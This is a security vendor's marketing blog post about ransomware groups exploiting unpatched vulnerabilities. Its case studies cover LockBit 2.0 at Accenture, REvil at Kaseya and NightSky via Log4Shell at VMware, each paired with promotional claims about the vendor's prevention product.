Ransomware’s Guilty Pleasure: Unpatched Vulnerabilities

March 24, 2022 | Charles Everette

Ransomware’s Guilty Pleasure: Unpatched Vulnerabilities 

Cybersecurity pros have had a tough few years with the accelerated onslaught of ransomware attacks. Damages were predicted at more than $6 trillion in 2021 and these attacks show no sign of slowing – in fact, we’re seeing a rise in attacks as they evolve to become more sophisticated and destructive.   

A major trend that has surfaced is a tactical one: we are now seeing cybercriminals actively exploiting vulnerabilities in common software that organizations use every day.  

What are unpatched vulnerabilities? 

Unpatched vulnerabilities are a favored entrance route for bad actors to breach networks. They occur when security teams fail to patch a vulnerability in a widely used software and it becomes an attack vector for ransomware. In 2021, there was a reported 29% rise in the exploitation of CVEs associated with ransomware. Ransomware gangs are leveraging zero-day vulnerabilities and taking advantage of older and known vulnerabilities that organizations have been slow to identify and patch. Shockingly, fifty-six percent of vulnerabilities identified prior to 2021 continue to be actively exploited by bad actors.  

Security and software vendors are continuously scanning, identifying, and providing critical education and patches around new vulnerabilities – but software is always going to be inherently risky. It is a key reason why known vulnerabilities and unpatched software must be addressed continuously by cybersecurity teams.  

Below are three common vulnerabilities that ransomware groups have leveraged and exploited on a global scale. The case studies detail real-life reports from our customers and our own testing that showcase Deep Instinct’s prowess in preventing these sophisticated and potent zero-day threats – stopping them pre-execution, before they can cause damage. 

Accenture 

Exploit/Ransomware family: LockBit 2.0 
Cost/Ransom Paid: $50M demanded 
Attack Type: Supply Chain and Extortion Ransomware attack 
Date: July, 2021 

Details: Accenture is a global IT firm and one of the world's largest tech consultancies, employing 569,000 employees across 50 countries. The Lockbit gang claimed to have stolen over 6 TB of files from the company in July 2021. LockBit heavily relies on mass vulnerability scanning to identify and exploit unpatched flaws or weaknesses. 

Accenture reportedly did not pay the ransom and claimed that the affected systems had been recovered from backup. Accenture shared that their restores took 3+ weeks due to investigation and systems cleanup. While the ransom was not paid, the attack cost them in brand reputation and customer trust.  

Takeaway: Deep Instinct would have prevented this ransomware attack from start to finish.   

Lockbit 2.0 leverages a malicious component called “Stealbit” to facilitate its extrication capabilities.  This is not the first time we have seen adoption of other technologies to increase the effectiveness of attack vectors and techniques utilized by cyber criminals. 

Deep Instinct was able to acquire a sample of Lockbit 2.0 (early August version) and test it against our prevention solution. Our threat team and investigators even broke the package down into several fragments and Deep Instinct prevented every attack vector within the samples. We were also able to collect several mutated and updated samples since then; Deep Instinct prevented all of these zero-day attacks.   

NOTE: One interesting aspect of this attack is the ransomware’s ability to kill any type of monitoring to prevent the collection of baseline data when securely being detonated – a feature that is impressive in its’ sophistication.   

Kaseya 

Exploit/Ransomware family: REvil 
Cost/Ransom Paid: $70M demanded 
Attack Type: Double Extortion and Data leak Ransomware attack 
Date: July, 2021 

Details: Kaseya offers an IT management system primarily used by managed service providers (MSPs) and IT teams to provide remote management, automation, and support to their customers. These systems are extremely valuable to IT management companies but can also have a significant negative impact if compromised. By infecting the parent supply chain system – Kaseya in this case – attackers can then attain access to hundreds if not thousands more.  

In this highly-visible attack – executed during the U.S. 4th of July holiday weekend – multiple MSPs and as many as 1500 end customers were impacted. 

It has been reported by internal whistleblowers that the vulnerability used to launch this attack was initially identified more than five years ago, but not patched. We know that Kaseya was in the process of patching this vulnerability and had already started applying the patches to their cloud infrastructure, which may have prompted the attackers to execute a more rapid attack. It was also shown that legitimate Windows applications were used to assist in sideloading the malicious files. 

Takeaway: Deep Instinct was able to protect over 29,000 systems across 2,000 clients that were defenseless to this zero-day vulnerability. Under the protection of our platform, zero infections were reported across all clients.   

NOTE: A very important distinction here is that the Deep Instinct version (Deep Learning algorithm) that was in use by our clients at the time of the Kaseya attack had been created more than eight months prior. It prevented these attacks with NO updates for those eight months highlighting the power of deep learning to Identify and prevent this zero-day attack.  

The scripts used to exploit and infiltrate the systems were prevented, the payload packages (if they had been able to be dropped) would have been stopped, and no part of the attack was successful or would have been successful.   

More detailed information from Deep instinct’s Threat Research team on the ransomware attack on Kaseya VSA can be found in our blog post: Deconstructing the REvil Ransomware Attack on Kaseya VSA

VMware  

Exploit/Ransomware family: China-based Aquatic Panda/NightSky ransomware 
Cost/Ransom Paid: Part of Log4J (Log4shell) vulnerability 
Attack Type: Double Extortion and Data leak/threat Ransomware attack 
Date: January, 2022 

Details: VMware’s Horizon product was found to have the Log4Shell vulnerability in its Apache Tomcat service embedded within the product. Once a web-facing server is identified with the vulnerability, the attacker uses LDAP to execute a malicious Java file that injects a web shell into the VM blast secure Gateway service. This allows the threat actors access to affected networks to use this system as a launch point to further infiltrate into the target’s infrastructure for nefarious purposes. 

While the threat actors originally only targeted VMware’s Horizon product, this vulnerability was later identified to impact 55 of VMware’s products, including vCenter, Carbon Black cloud workload and EDR, vRealize, and others. VMware released a patch on February 14, 2022, although it remains to be seen how long this vulnerability will continue to impact organizations that fail to prioritize and patch.  

Takeaway: Deep Instinct’s multi-layer protection was able to detect and prevent NightSky ransomware from running. Deep Instinct stops more threats, faster, than any legacy EPP or EDR in the world, including unknown and zero-day threats.    

Take a Prevention-First Approach with Deep Instinct 

Deep Instinct’s Threat Research team has acquired access to all IOCs and suspected ransomware payloads and packages that were detailed in the above ransomware attacks.  

Not only would Deep Instinct have prevented 100% of the attacks if the Deep Instinct Protection Platform was in use on the endpoints of the victims’ environments, but in >99% of samples tested Deep Instinct would have prevented these attacks even with a version of Deep Instinct’s “D-brain” that was created long before the attacks (3-8 months) and with zero updates since deployment. 

To learn more about Deep Instinct’s unique deep learning framework, check out this video

If you’d like to learn more about our malware, ransomware, and zero-day prevention capabilities – including our industry best $3M no-ransomware guarantee – we’d be delighted to give you a demo.